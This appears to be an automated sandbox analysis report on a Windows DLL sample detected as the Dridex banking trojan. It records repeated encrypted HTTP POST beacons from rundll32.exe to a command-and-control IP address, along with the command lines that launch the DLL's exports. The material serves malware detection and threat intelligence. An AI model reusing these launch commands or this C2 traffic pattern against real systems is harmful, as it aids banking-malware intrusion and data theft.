                                                                                                      2021-10-28 02:57:04 UTC404OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:57:05 UTC409INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:57:05 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      82192.168.2.750145192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:57:05 UTC409OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:57:05 UTC409OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:57:06 UTC414INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:57:06 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      83192.168.2.750151192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:57:08 UTC414OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:57:08 UTC414OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:57:09 UTC424INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:57:09 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      84192.168.2.750153192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:57:09 UTC419OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:57:09 UTC419OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:57:10 UTC424INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:57:09 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      85192.168.2.750159192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:57:14 UTC424OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:57:14 UTC424OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:57:14 UTC429INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:57:14 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      86192.168.2.750161192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:57:14 UTC429OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:57:14 UTC429OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:57:15 UTC434INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:57:15 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      87192.168.2.750167192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:57:18 UTC434OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:57:18 UTC434OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:57:18 UTC439INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:57:18 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      88192.168.2.750169192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:57:18 UTC439OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:57:18 UTC439OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:57:19 UTC444INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:57:19 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      9192.168.2.749763192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:36 UTC44OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:36 UTC45OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:37 UTC49INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:37 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Start time:04:53:15
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll'
                                                                                                      Imagebase:0xda0000
                                                                                                      File size:893440 bytes
                                                                                                      MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000001.00000002.777092817.000000006E551000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000001.00000003.362955357.00000000010F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate

                                                                                                      General

                                                                                                      Start time:04:53:16
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll',#1
                                                                                                      Imagebase:0x870000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:04:53:16
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll,Bluewing
                                                                                                      Imagebase:0x50000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000003.328249768.0000000004DB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:04:53:16
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll',#1
                                                                                                      Imagebase:0x50000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000003.328754438.0000000002BD0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000002.777831655.000000006E551000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:04:53:20
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll,Earth
                                                                                                      Imagebase:0x50000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000003.352634465.00000000034A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:04:53:28
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll,Masterjust
                                                                                                      Imagebase:0x50000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000007.00000003.361724173.0000000004110000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >